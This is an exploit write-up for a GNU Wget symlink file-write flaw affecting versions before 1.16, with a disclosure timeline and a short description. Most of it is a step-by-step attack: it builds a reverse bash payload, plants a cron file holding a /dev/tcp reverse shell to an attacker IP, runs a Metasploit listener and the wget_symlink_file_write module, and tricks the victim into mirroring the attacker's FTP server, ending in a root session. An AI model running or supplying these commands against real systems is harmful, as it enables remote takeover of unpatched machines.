Timeline :
Vulnerability discovered by hdm the 2014-08-24
Vulnerability notified to vendor the 2014-08-24
Patched by the vendor the 2014-09-01
Advisory release the 2014-10-27
Metasploit PoC provided the 2014-10-27
PoC provided by :
HD Moore of Rapid7
Reference(s) :
Affected version(s) :
All GNU Wget before version 1.16
Tested on :
Ubuntu Server 12.10 with GNU Wget version 1.13.4 and root user
Description :
This module exploits a vulnerability in Wget when used in recursive (-r) mode with a FTP server as a destination. A symlink is used to allow arbitrary writes to the target’s filesystem. To specify content for the file, use the “file:/path” syntax for the TARGET_DATA option. Tested successfully with wget 1.14. Versions prior to 1.16 are presumed vulnerable.
Commands :
1. Create a reverse bash payload msfvenom -p cmd/unix/reverse_bash -f raw LHOST=192.168.6.138 2. Create a crontab file that run once a minute, that launches the bellow command cat>cronshell <usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin * * * * * root bash -c '0<&148-;exec 148<>/dev/tcp/192.168.6.138/4444;sh <&148 >&148 2>&148’; rm -f /etc/cron.d/cronshell EOD 3. Run a shell listener in Metasploit use exploit/multi/handler set PAYLOAD cmd/unix/reverse_bash set LHOST 192.168.6.138 run -j 4. Run the wget_symlink_file_write Metasploit module use auxiliary/server/wget_symlink_file_write set SRVHOST 192.168.6.138 set TARGET_FILE /etc/cron.d/cronshell set TARGET_DATA file:/root/cronshell set SRVPORT 21 run 5. On victim machine execute the bellow command wget -m ftp://192.168.6.138:21/ 6. Get the Metasploit session session -i 1 id uname -a